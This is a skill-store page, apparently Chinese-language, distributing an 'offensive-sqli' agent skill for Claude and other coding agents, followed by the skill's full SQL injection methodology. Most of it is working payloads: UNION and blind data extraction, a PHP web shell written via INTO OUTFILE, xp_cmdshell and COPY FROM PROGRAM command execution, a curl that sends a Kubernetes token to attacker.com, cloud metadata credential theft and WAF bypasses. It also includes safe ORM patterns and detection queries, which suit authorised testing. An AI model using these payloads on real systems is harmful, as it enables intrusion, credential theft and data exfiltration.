‹ 首页

offensive-sqli

@snailsploit · 收录于 1 周前 · 上游提交 2 个月前

SQL injection testing skill for offensive security assessments and bug bounty hunting. Covers error-based, UNION-based, boolean/time-based blind, out-of-band, second-order, NoSQL, GraphQL, WebSocket, and JSON-operator SQLi. Includes WAF bypass techniques, database-specific exploitation (MySQL, MSSQL, PostgreSQL, Oracle), cloud-native attack paths, ORM CVE tracking, and SQLmap automation. Use when performing web application SQL injection testing, database enumeration, privilege escalation via SQLi, or assessing injection vectors in APIs and modern stacks.

适合你,如果需要进行 SQL 注入测试和数据库安全评估

/ 下载安装
offensive-sqli.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add snailsploit/claude-red/offensive-sqli
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-sqli
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify snailsploit/claude-red/offensive-sqli
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2669GitHub stars
~2.2K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 aeb41ec · 表述以原文为准
它做什么

安装后,Claude 会指导你进行 SQL 注入测试,包括检测、利用和绕过 WAF 等步骤,并给出具体的 SQL 命令和自动化脚本。

什么时候触发

当你进行 Web 应用安全测试、漏洞赏金狩猎,需要测试 SQL 注入漏洞时触发。

装好后可以这样说
Claude 会指导你发送探测 payload。
Claude 会给出对应数据库的延时函数。
Claude 会列出编码、注释等绕过技巧。
技能原文 SKILL.md作者撰写 · MIT · aeb41ec

SQL Injection — Offensive Testing Methodology

Quick Workflow
  1. Map all input vectors that reach the database (URL params, POST body, cookies, headers, API filters, WebSocket messages)
  2. Insert probe payloads to detect classic SQLi; fall back to inferential (boolean/time-based) if no visible error
  3. Identify database type and enumerate schema
  4. Exploit to extract data, escalate privileges, or achieve RCE where in scope
  5. Document findings and suggest remediation

Detection
Basic Probes — All Input Vectors
' " ; -- /* */ # ) ( + , \  %
' OR '1'='1
" OR "1"="1
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
Error-Based Detection

Trigger syntax errors to reveal database type and query structure:

'  ''  `  "  ""  ,  %  \

Look for: SQL syntax errors, DB version strings, table/column names leaked in responses.

Boolean-Based Blind
' OR 1=1 --
' OR 1=2 --
' AND 1=1 --
' AND 1=2 --

Observe response size/content differences between true and false conditions.

Time-Based Blind
-- MySQL
' OR SLEEP(5) --
-- PostgreSQL
' OR pg_sleep(5) --
-- MSSQL
' WAITFOR DELAY '0:0:5' --
-- Oracle
'; BEGIN DBMS_LOCK.SLEEP(5); END; --
JSON Operator Probes
-- MySQL
id=1 AND JSON_EXTRACT('{"a":1}', '$.a')=1
-- PostgreSQL
id=1 AND '{"a":1}'::jsonb ? 'a'
GraphQL → SQLi Pivot
{"query":"query{ users(filter: \"' OR 1=1 --\"){ id email }}"}
WebSocket SQLi
const ws = new WebSocket("wss://target.com/api/search");
ws.send('{"action":"search","query":"test\\\' OR 1=1--"}');
REST API Filter Injection
POST /api/users/search
{
  "filter": { "name": {"$regex": "admin' OR 1=1--"} },
  "sort": "name'; DROP TABLE users--"
}

Automation Workflow
# Full pipeline
sublist3r -d target | tee domains
cat domains | httpx | tee alive
cat alive | waybackurls | tee urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch

# Targeted with Burp capture
# 1. Capture request → Send to Active Scanner
# 2. Review SQL findings → manually verify
# 3. Export request file → sqlmap -r req.txt --dbs

# Blind SQLi (Ghauri — faster for time-based)
ghauri -u "https://target.com/page?id=1" --dbs

# Hidden parameter discovery
hakrawler -url https://target.com | tee crawl
arjun -i crawl -oJ params.json

Exploitation
Determine Column Count (UNION)
' UNION SELECT NULL-- -
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL-- -
Identify String Columns
' UNION SELECT 'a',NULL,NULL-- -
' UNION SELECT NULL,'a',NULL-- -
Enumerate Schema
-- DB version
' UNION SELECT @@version --          -- MySQL/MSSQL
' UNION SELECT version() --          -- PostgreSQL
' UNION SELECT banner FROM v$version -- -- Oracle

-- Tables
' UNION SELECT table_name,1 FROM information_schema.tables --    -- MySQL/MSSQL/PG
' UNION SELECT table_name,1 FROM all_tables --                   -- Oracle

-- Columns
' UNION SELECT column_name,1 FROM information_schema.columns WHERE table_name='users' --
Blind Data Extraction
-- Boolean character-by-character
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 0,1)='a'-- -

-- Time-based conditional
' AND (SELECT CASE WHEN (username='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)-- -

Database-Specific Exploitation
MySQL / MariaDB
-- File read
' UNION SELECT LOAD_FILE('/etc/passwd') --

-- Write web shell
' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php' --

-- Schema leak
' UNION SELECT table_schema,table_name FROM information_schema.tables
  WHERE table_schema NOT IN ('mysql','information_schema') --
MSSQL
-- OS command execution
'; EXEC xp_cmdshell 'net user' --

-- Registry read
'; EXEC xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion','ProductName' --

-- Linked server pivot
'; EXEC ('SELECT * FROM OPENROWSET(''SQLOLEDB'',''Server=linked_server;Trusted_Connection=yes'',''SELECT 1'')') --
PostgreSQL
-- File read
' UNION SELECT pg_read_file('/etc/passwd',0,1000) --

-- OS command execution
'; CREATE TABLE cmd_exec(cmd_output text);
  COPY cmd_exec FROM PROGRAM 'id';
  SELECT * FROM cmd_exec; --

-- K8s service account token exfil
'; COPY (SELECT '') TO PROGRAM 'curl http://attacker.com/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)'; --
Oracle
-- Privilege enumeration
' UNION SELECT * FROM SYS.USER_ROLE_PRIVS --

-- PL/SQL execution
' BEGIN DBMS_JAVA.RUNJAVA('java.lang.Runtime.getRuntime().exec(''cmd.exe /c dir'')'); END; --

NoSQL & Graph Injection
MongoDB
username[$ne]=admin&password[$ne]=
username[$regex]=^adm&password[$regex]=^pass
{"$where": "sleep(5000)"}
{"username": {"$in": ["admin"]}}
Neo4j / Cypher (CVE-2024-34517)
-- Normal
MATCH (u:User) WHERE u.name = 'admin' RETURN u
-- Bypass
MATCH (u:User) WHERE u.name = 'admin' OR 1=1 //--' RETURN u

Older Neo4j 5.x (<5.18 / <4.4.26) allowed privilege escalation via IMMUTABLE procedures.


WAF Bypass Techniques

| Technique | Example | |-----------|---------| | Case variation | SeLeCt, UnIoN | | Comment injection | UN/**/ION SE/**/LECT | | URL encoding | UNION%55%4E%49%4F%4E | | Hex encoding | SELECT0x53454C454354 | | Whitespace | UNION/**/SELECT | | Null byte | %00' UNION SELECT password FROM users-- | | Double encoding | %2f%252f | | String concat | MySQL: CONCAT('a','b'), Oracle: 'a'\|\|'b', MSSQL: 'a'+'b' | | JSON wrapper | Prefix with dummy JSON /**/{"a":1} to confuse WAF parsers |

SQLmap tamper scripts: Use the Atlas tool to suggest tampers; combine multiple (--tamper=space2comment,charencode) for layered WAFs.

HTTP/2 smuggling: Replay payloads over h2/h2c; HPACK compression can obscure payloads from perimeter WAFs.


Cloud-Specific Attack Paths
AWS
-- IMDSv1 credential theft (legacy environments)
' UNION SELECT LOAD_FILE('http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name') --

-- RDS Proxy disruption
'; CALL mysql.rds_kill(CONNECTION_ID()); --
Azure
-- Azure SQL Managed Instance RCE
'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
'; EXEC xp_cmdshell 'az vm list'; --

-- Instance metadata
' UNION SELECT LOAD_FILE('http://169.254.169.254/metadata/instance?api-version=2021-02-01') --
GCP Cloud SQL
' UNION SELECT @@global.version_comment, @@hostname --
Lambda / Serverless Connection Pool Poisoning
// SET ROLE persists across Lambda invocations when DB connections are reused
exports.handler = async (event) => {
  await db.query(`SET ROLE '${event.role}'`); // injectable — poisons pool
  return await db.query("SELECT * FROM sensitive_data");
};

ORM CVE Tracking (2023–2025)

| ORM | CVE / Issue | Vulnerable Pattern | |-----|------------|-------------------| | Sequelize | CVE-2023-22578 | sequelize.literal(\name = '${userInput}'\) | | TypeORM <0.3.12 | findOne injection | repository.findOne({ where: \id = ${id}\ }) | | Hibernate 6.x | Query cache poisoning | session.createQuery("FROM User WHERE name = '" + input + "'") | | Prisma <4.11 | Raw query | prisma.$executeRawUnsafe(\SELECT * FROM users WHERE id = ${id}\) |

Safe ORM patterns:

// Sequelize — use replacements
sequelize.query('SELECT * FROM users WHERE name = :name', { replacements: { name: user } })
// Prisma — tagged template literal
await prisma.$queryRaw`SELECT * FROM users WHERE name = ${user}`
// Knex
knex('users').whereRaw('name = ?', [user])

Quick-Reference Cheatsheet

| DB | Version | Time Delay | String Concat | Schema Source | |----|---------|-----------|--------------|---------------| | MySQL | @@version | SLEEP(5) | CONCAT('a','b') | information_schema.tables | | MSSQL | @@version | WAITFOR DELAY '0:0:5' | 'a'+'b' | information_schema.tables, sys.tables | | PostgreSQL | version() | pg_sleep(5) | 'a'\|\|'b' | information_schema.tables | | Oracle | banner FROM v$version | DBMS_PIPE.RECEIVE_MESSAGE('RDS',5) | 'a'\|\|'b' | all_tables, all_tab_columns |


Detection & Monitoring Queries

Splunk:

index=web sourcetype=access_combined
| regex _raw="(%27)|(\\')|(\\-\\-)|((%3D)|(=))[^\\n]*((%27)|(\\')|(\\-\\-)|(\\%3D))"
| eval suspected_sqli=if(match(_raw,"(?i)(union|select|insert|update|delete|drop|create|alter|exec)"),"high","low")
| where suspected_sqli="high"
| table _time, src_ip, uri, user_agent, status

AWS CloudWatch Insights (RDS):

fields @timestamp, @message
| filter @message like /(?i)(UNION|SELECT.*FROM|INSERT INTO|UPDATE.*SET|DELETE FROM)/
| filter @message like /(%27|'|--|\\/\\*)/
| stats count() by bin(5m)

Key References
  • MITRE ATT&CK: T1190 (Exploit Public-Facing Application)
  • OWASP ASVS 4.0: V5.3.4 — parameterized queries required
  • PCI DSS 4.0: Requirement 6.2.4 — injection protection mandatory
  • CISA KEV Catalog — monitor for actively exploited SQLi CVEs
  • Source: https://github.com/SnailSploit/offensive-checklist/blob/main/sql-injection.md
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。